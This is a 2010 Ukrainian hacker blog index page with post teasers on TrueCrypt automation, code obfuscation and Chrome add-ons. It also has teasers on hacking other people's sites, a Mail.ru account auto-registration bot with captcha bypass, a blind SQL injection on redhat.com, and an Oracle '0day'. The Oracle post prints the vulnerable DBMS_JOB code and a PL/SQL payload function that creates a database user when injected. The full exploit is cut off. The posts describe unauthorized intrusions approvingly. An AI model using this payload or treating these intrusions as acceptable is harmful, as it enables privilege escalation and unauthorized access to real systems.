Truecrypt, VBS, Acer – автоматизуємо монтування прихованих образів

July 27th, 2010 Dimi4 2 comments

Давно нічого тут не писалось, тому вирішив трохи освіжити блог, та й нагадати начим читачам що ми існуєм). Отож почнем..

Прикупив собі новий ноутбук –  Acer Aspire 5738z. Повинен сказати – просто краса, ноутбук і справді непоганий. У зв’язку з збільшенням квоти на харддиску вирішив завести собі окремий прихований розділ, закриптований trucrypt. Все пройшло чудово, розділ захищений файлом ключів, що замасковані під mp3 файл. Та запускати зажди трукрипт, вибирати розділ, ключі, монтувати мене не приваблювало. Але ця проблема досить легко вирішилась. Як? Читаєм підкатом..

Read more…

“Піднімаємо” свій IRC-bouncer

May 28th, 2010 poma No comments

psybnc
Привіт =)
В цьому пості я постараюсь розказати ( і показати ) як встановили \ налаштувати свій ірц-баунсер (IRC bouncer) на машину з ОС Windows =)
Якшо поконкретніше, то будемо ставити psybnc 2.3.
І для цього нам потрібен дедік, VPS, чи VDS з виділеним IP =)
Read more…

Categories: Інше Tags: ,

C#: привязка програми

May 25th, 2010 poma 7 comments
  Привіт =)
В минулому пості я розказував про обфускацію коду, в цьому розкажу як створити свою “привязку” програми до конкретного компа.

Read more…

Categories: Інше Tags: , ,

C# обфускація коду

May 13th, 2010 poma 1 comment
Знаю, знаю.. перше шо ви подумали – “таких статтей\доків є куча в мережі..”..

Причиною написання цієї замітки стала нехватка укр-статей в інтернеті..

Наприклад мені так і не вдалося знайти цікаву статтю, з кольоровими скріншотами і з детальною інструкцією встановлення \ використання обфускатора..

Сам недавно стовкнувся з проблемою захисту коду від реверсу в С#..
А так, як статей на цю тему по укр не знайшов, прийшлося самим розбиратися =)

І сьогодні я постараюся просвітити вас, мої юні падавани :D

http://dotnetslackers.com/images/articleimages/ObfuscateMemberNamesBefore.jpg

Read more…

Categories: Інше Tags: , ,

Обмежуємо швидкість скачування контенту через php-скрипт

May 13th, 2010 poma 1 comment
http://www.goclipless.com/images/speedbandits_speed_limit_prevention.jpg Віддавати контект через php це нонсенс трошки звичайно.. але деколи так зручніше, та й зручніше ;)
Лімітувати швидкість віддачі також повинен не php скрипт, бо нагружає сервер непотрібною роботою та й витрачає його память, а сервер. Але через сервер це робити – трошки геморно ;)
Але шо поробиш, якшо немає “прямого” доступу до налаштувань apache, навіть якщо немає ssh? =(
Тоді немає вибору просто.. приходиться все робити через скрипт..

Read more…

Categories: Інше Tags:

У гостях мемберів антічату ;-) або дружній взлом rebz.net та x2b.ru

May 7th, 2010 snake 12 comments

Привіт не з РОА. Щось довго я тут нічого не писав, ось вирішив вам розповісти про дружній взлом сайтів усім відомих мемберів проекту antichat.ru – Rebz та Qwazar. Якщо для першого це основне місце прибування, то для другого – це майже забутий проект.
Read more…

Categories: Інше Tags:

Mail.Ru автореггер

April 19th, 2010 poma No comments


перл \ багатопоточність \ антикапча \ проксі
Read more…

Categories: Інше Tags:

Google Chrome: самі пишемо аддони

April 18th, 2010 poma 8 comments

Недавно було потрібно написати свій плагін для Хрома, прийшлося “вникнути” в алгоритм написання таких плагінів )

Про то , як написати свій плагін для Хрома – читаємо далі..
Read more…

Знімаємо капелюха або .redhat.com sql-inj ;-)

April 14th, 2010 snake 3 comments

Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.

Не буду тягнуть кота за яйця:
Read more…

TARGET: ORACLE. 0day експлойт

April 12th, 2010 dsu 2 comments

Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30 CUR := DBMS_SQL.OPEN_CURSOR;
31 BEGIN
32
33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
34 ' from dual', DBMS_SQL.NATIVE );
...

INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо  комусь і буде потрібно. Але щоб довести справу до переможного кінця,  знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.

...
134 MYDATE: = FIND_DATE (INTERVAL);
135 IF NOT NO_PARSE THEN
136 PARSE_JOB (WHAT);
137 END IF;
138
...

Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.

CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/

Ну і власне сам експлойт (під катом):
Read more...